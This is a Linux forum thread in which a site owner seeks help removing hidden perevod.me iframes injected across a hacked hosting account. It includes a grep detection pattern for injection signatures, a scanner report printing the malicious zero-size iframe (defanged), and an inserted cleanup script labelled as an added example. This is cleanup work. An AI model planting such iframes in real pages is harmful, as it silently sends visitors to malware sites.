- 02-12-2013 #1Just Joined!
- Join Date
- Feb 2013
- Posts
- 5
hosting server find and replace script?
I have a huge problem! For several years I have paid for a hosting service and after installing a mobile access service to allow cell phone access to my sites, all heck broke loose. I had a plugin hacked and yes I am 99% certain it was the mobi access as timing is way too coincidental. So now I have an infected hosting server. I was told to write a find and replace script by their tech support. To be honest I have not worked with Linux/Unix in years (1980's) and am not confident enough to try this without advice.
I will give below the line so you can see what's found. The tech support guy was kind enough to do a search for the perevod.me iframes hack/infection.
find ./ -type f \( -iname \*.php -o -iname \*html\* -o -iname \*.js \) -print0 |xargs -0 egrep -ils '(eval\(base64\_decode|Array\(base64\_decode|\/*\/preg\_replace\(|function_exists\(.*\_jquery\_theme |iframe src\=\"xxxx\:\/\/perevod)'
Had to replace the http with xxxx above because the site here thinks I am posting a link.
Now I have to figure out how to use a script to remove this trash.
Additional question: I found out the site perevod dot me is a fraud site according to the WHOIS Search, Domain Name, Website, and IP Tools - Who. information. The site city is fake, judging by the zip code, the telephone number is a sales infomercial for HGH, and the street address is also fake. I thought ICANN would disallow a registration over the fraud. How can I get this site removed as it is the hackers/infection site and it is also a blacklisted site loaded with really bad malware.
Anyways can anyone give me some advice on how to do a find and replace script?
- 02-12-2013 #2
Hi and welcome
Sorry, but a search&replace is not enough, because it only removes the symptom, not the cause.
My recommendation is to take this host off the net,
analyze how the hack happened
backup and verify your data, config and logs
and then install a new system.
You must always face the curtain with a bow.
- 02-12-2013 #3Just Joined!
- Join Date
- Feb 2013
- Posts
- 5
The problem appears to be the plugin, this was looked at by myself, and two techs at the server hosting company, and the techs reported the exploit to their management to have the plugin company put on notice. So this problem and plugin have been banished, and since there have been zero intrusions. Now I need to get rid of the iframes left over.
- 02-12-2013 #4
Best practice is to reinstall. Your call.
The find line in your first post will provide a filelist.
So the next best recommendation is to recover these files from a point in time before this plugin has been installed.
- 02-12-2013 #5Just Joined!
- Join Date
- Feb 2013
- Posts
- 5
A backup and reinstall will not work. They did a huge upgrade and server maintenance Sunday and all the backups are corrupted now. Plus the backups are not old enough to be prior to the plugin addition months ago. Yes I should have not trusted the server to have good backups going back that far, but what's done is done.
I need to know how to write a find and replace to remove this problem as all the 400.shtml files are also infected, this infection is so pervasive it has even infected themes and you name it. So short of destroying years of work, and site information, I need to try a script to avoid the loss of several years of running 3 sites.
Does anyone have enough knowledge to advise me how to write such a script?
- 02-12-2013 #6
Search&replace is hard, if neither the current infected nor previous good state is given.
I tried to find technical background information about what "perevod" actually changes, especially if really only webfiles (.html, .js, etc) are affected.
But apart from pointers to some obscure Russian sites, I couldn't find anything.
As you and the techs looked at the hack: Can you tell and print in total what has been inserted?
For obvious reasons, please make sure that links to malicious sites are not pasted verbatim here.
Also please use code tags.
- 02-12-2013 #7Just Joined!
- Join Date
- Feb 2013
- Posts
- 5
Here is a find script we used. This may be only a partial list.
./theblog/wp-content/themes/7730jm-photo/index.php
./theblog/wp-content/themes/7730jm-photo/html/mod_login/index.html
./theblog/wp-content/themes/7730jm-photo/html/mod_footer/index.html
./theblog/wp-content/themes/7730jm-photo/html/mod_search/index.html
./theblog/wp-content/themes/7730jm-photo/html/index.html
./theblog/wp-content/themes/7730jm-photo/html/mod_banners/index.html
./page1/themes/bluemarine/page.tpl.php
./page1/themes/garland/maintenance-page.tpl.php
./page1/themes/garland/page.tpl.php
./page1/themes/pushbutton/page.tpl.php
./page1/modules/book/book-export-html.tpl.php
./page1/modules/system/maintenance-page.tpl.php
./page1/modules/system/page.tpl.php
.................................................. ..........................
- 02-12-2013 #8Linux Enthusiast
- Join Date
- Apr 2012
- Location
- Virginia, USA
- Posts
- 561
So, a lot of times when a server gets hacked the DBs are infected too. You'll have to manually scrub your DBs as well as change their passwords.
Anyway, best way I can think of is go to each directory and subdirectory and run the following (after stopping the webserver):
grep -i iframe *
That will search each file in the directory for an instance of "iframe".
The output of the command will be something like:
filename1: <iframe> blahblahblah
filename2: blha <ifRamE>blah blah blah
You get it.
Also change the admin login pw's for your website's admin login area, if applicable.
Also, I would run the same steps with
grep -i script *
and manually review each and every instance of a script reference. Lots of times there are off-site JavaScripts embedded in each of the files.
After you have cleaned up your files (don't forget important config files such as httpd.conf / apache2.conf), archive them and scan them for viruses. Do the same with the DBs. Next, have your VM/VPS reinstalled fresh, and restore your files. This will prevent any tampered system files from performing as a rootkit.
- 02-12-2013 #9Just Joined!
- Join Date
- Feb 2013
- Posts
- 5
The passwords were changed the second we knew there was an issue.
Here is a report from Sucuri check. I am not allowed to enter a URL, so I removed the http and added xxxx in place of it.
Known javascript malware.
Details:sucurinet/malware/malware-entry-mwiframeenc1560
<iframe src="xxxx://perevod.me/sts/sTDS/go.php?sid=1" width="0" height="0" frameborder="0"></iframe></body>
Hidden Iframes.
Details: sucurinet/malware/entry/MW:IFRAME:HD202
<iframe src="xxxx://perevod.me/sts/sTDS/go.php?sid=1" width="0" height="0" frameborder="0">
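The find-and-replace asked for in this thread, as an added example that is not part of any post: it lists files carrying the iframe from the scan report, lists every zero-width iframe for the manual review suggested above, and strips only the known tag while keeping a backup of each file. The function names and script name are illustrative, and GNU sed is assumed.

```shell
#!/bin/sh
# Added example, not from the thread. Function names are illustrative.
# INJECTED matches the tag from the scan report under any scheme, so the
# defanged "xxxx://" form and a live one are both caught.
INJECTED='<iframe[^>]*src="[a-z]*://perevod\.me/[^"]*"[^>]*>\(</iframe>\)\{0,1\}'
# HIDDEN matches any iframe with a zero width attribute, whatever its source.
HIDDEN='<iframe[^>]* width="\{0,1\}0"\{0,1\}[ >/]'

# Run grep with options $2 and pattern $3 over the web files below $1.
# Same file types as the support tech's find; *.bak backups are skipped.
# grep exits 1 for a batch with no hit and find passes that on, hence "|| true".
scan() {
    find "$1" -type f \( -iname '*.php' -o -iname '*html*' -o -iname '*.js' \) \
        ! -name '*.bak' -exec grep "$2" -e "$3" {} + || true
}

list_injected() { scan "$1" -il "$INJECTED"; }  # names of files carrying the tag
list_hidden()   { scan "$1" -iHn "$HIDDEN"; }   # file:line:text for manual review

# Strip the known tag in place. The untouched original stays beside each
# file as FILE.bak (GNU sed: -i.bak, and the I flag for case-insensitivity).
clean_injected() {
    list_injected "$1" | while IFS= read -r f; do
        sed -i.bak "s#$INJECTED##gI" "$f"
        echo "cleaned: $f"
    done
}

# Usage: sh iframe_clean.sh DIR          report hidden iframes only
#        sh iframe_clean.sh DIR --clean  also strip the known tag
if [ "$#" -gt 0 ]; then
    list_hidden "$1"
    if [ "${2:-}" = "--clean" ]; then clean_injected "$1"; fi
fi
```

Once `list_injected` comes back empty and the pages render correctly, move the `.bak` copies out of the web root, since they still contain the tag.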
- 02-12-2013 #10Linux Enthusiast
- Join Date
- Apr 2012
- Location
- Virginia, USA
- Posts
- 561



